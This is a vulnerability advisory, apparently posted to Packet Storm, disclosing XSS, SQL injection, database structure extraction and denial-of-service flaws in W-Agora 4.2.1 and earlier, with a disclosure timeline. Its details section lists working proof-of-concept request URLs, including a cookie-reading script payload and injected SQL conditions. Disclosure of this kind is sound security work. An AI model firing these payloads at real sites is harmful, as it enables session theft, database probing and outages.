W-Agora versions 4.2.1 and below suffer from cross site scripting, denial of service, and remote SQL injection vulnerabilities.
ef75e866d4249b6b095182cd5de8fd073063a90cc658c257e7322bad0e6a6f9d
Hello Packet Storm!
I want to warn you about Cross-Site Scripting, SQL DB Structure Extraction,
SQL Injection and Denial of Service vulnerabilities in W-Agora.
SecurityVulns ID: 11324.
-------------------------
Affected products:
-------------------------
Vulnerable are W-Agora 4.2.1 and previous versions.
----------
Details:
----------
XSS (WASC-08):
http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1
SQL DB Structure Extraction (WASC-13):
http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1
SQL Injection (WASC-19):
http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1
DoS (WASC-10):
http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25
http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=
http://site/current/list.php?site=support&bn=support_news
------------
Timeline:
------------
2010.10.30 - announced at my site.
2010.11.01 - informed developers.
2010.12.25 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4650/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua